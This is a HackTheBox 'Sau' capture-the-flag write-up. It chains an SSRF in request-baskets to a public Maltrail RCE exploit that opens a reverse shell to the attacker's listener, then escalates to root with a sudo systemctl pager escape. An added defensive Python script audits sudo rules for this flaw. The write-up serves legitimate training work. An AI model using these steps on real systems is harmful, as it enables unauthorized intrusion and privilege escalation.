Sau

Sau writeup by Thamizhiniyan C S

Overview

Hello everyone! In this blog we are going to solve Sau from HackTheBox.

Link for the machine : https://app.hackthebox.com/machines/Sau

Let's start 🙌

Connect to the HTB server using the OpenVPN configuration file generated by HTB.

[ Click here to learn more about how to connect to the VPN and access the boxes. ]

After connecting to the VPN service, click on Join Machine to get the machine's IP.

After joining the machine you can see the IP Address of the target machine.


Reconnaissance

First I started by scanning for open ports on the target machine.

From the nmap output there are 3 open ports: SSH on port 22; HTTP on port 80, which is filtered by a firewall; and port 55555, which nmap could not identify but which returns a response to an HTTP GET request.

On visiting port 55555 via a browser, it returned a website.


Enumerating the Website

The website is running the request-baskets service, version 1.2.1. On searching for this service on Google, I found this:

which shows that this version is vulnerable to SSRF. To exploit this vulnerability, first create a new basket.

Next, make a note of the basket name and the access token, and click on Open Basket.

After opening the basket click on the settings icon on the top right corner.

It opens a configuration dialog box.

In the configuration dialog box, fill in the details as shown in the above figure and click Apply. With this configuration we are trying to reach the HTTP service running on port 80, which is blocked by the firewall on the target machine, by leveraging the SSRF vulnerability.

Basically, whatever URL we configure in the request basket, the request-baskets service will send a GET request on our behalf and fetch the result for us. In our case it acts as a proxy to fetch a website that is not accessible to us from the outside network but is accessible to the request-baskets application, since it runs on the same network as the web service.

Now open the link [ mentioned in the above picture; the link might be different in your case ] in a new tab.

We can see a website running Maltrail v0.53; nothing else on the site is interesting. So I started searching about Maltrail v0.53 and found this,

from which we can conclude that the service is vulnerable to RCE.


Getting the User Flag

I downloaded the payload to give it a try.

Before executing the payload, I started a netcat listener on port 8000.

Now it's time to execute the payload.

Command: python3 51676 <HTB_VPN_TUN_IP> 8000 <the_request_basket_address_that_we_used_to_access_the_web_service>

After executing the exploit, check the netcat listener.

We successfully got the connection back and now have initial access to the target machine. First I upgraded the shell.

Command: python3 -c 'import pty; pty.spawn("/bin/bash")'

I also found the user flag.


Getting the Root Flag

Now it's time to escalate our privileges and find the root flag.

I was looking out for some common privilege escalation vectors and found this.

The user puma can run the command /usr/bin/systemctl status trail.service with sudo without entering a password. I checked GTFOBins regarding this and found this:

Thus if we run sudo /usr/bin/systemctl status trail.service and then type !sh once inside the less pager that systemctl opens, we can escalate our privileges to root.
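From the defender's side, the root cause here is a sudoers rule that lets a user run a command which hands control to a pager. The following audit script is an added example (not part of this writeup) that scans `sudo -l` output for such rules and proposes the `--no-pager` form; the sample output is constructed to mirror the puma rule above, and the list of pager-spawning binaries (systemctl, journalctl) goes slightly beyond the page, which only shows systemctl.

```python
import re

# Constructed sample of `sudo -l` output, modelled on the rule found in the writeup.
SAMPLE_SUDO_L = """Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    (root) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
    (ALL) /usr/bin/apt update
"""

# Binaries that invoke $PAGER (less by default) when attached to a terminal.
PAGER_COMMANDS = {"systemctl", "journalctl"}
PAGER_DISABLING_FLAGS = {"--no-pager"}

# One sudoers rule line: "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/.*)$")


def find_pager_privesc_rules(sudo_l_output):
    """Return the sudo rules whose command will drop into an interactive pager."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        argv = cmd.split()
        binary = argv[0].rsplit("/", 1)[-1]
        if binary not in PAGER_COMMANDS:
            continue
        if any(flag in argv for flag in PAGER_DISABLING_FLAGS):
            continue  # pager already disabled; sudo matches arguments exactly
        findings.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": cmd,
        })
    return findings


def suggest_fix(cmd):
    """Rewrite a flagged command so the pager is never started."""
    argv = cmd.split()
    return " ".join([argv[0], "--no-pager"] + argv[1:])


if __name__ == "__main__":
    for f in find_pager_privesc_rules(SAMPLE_SUDO_L):
        print(f"RISK ({f['runas']}, nopasswd={f['nopasswd']}): {f['command']}")
        print(f"  suggested rule: {suggest_fix(f['command'])}")
```

Because sudo matches the command arguments literally, a rule that already contains `--no-pager` cannot be invoked without it, so the suggested form closes this particular escape; dropping the rule entirely is still the safer choice when the user has no need for it.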

Now we have successfully escalated our privileges to root. Next, it's time to find the root flag.

We have successfully found the root flag.

Thank you!
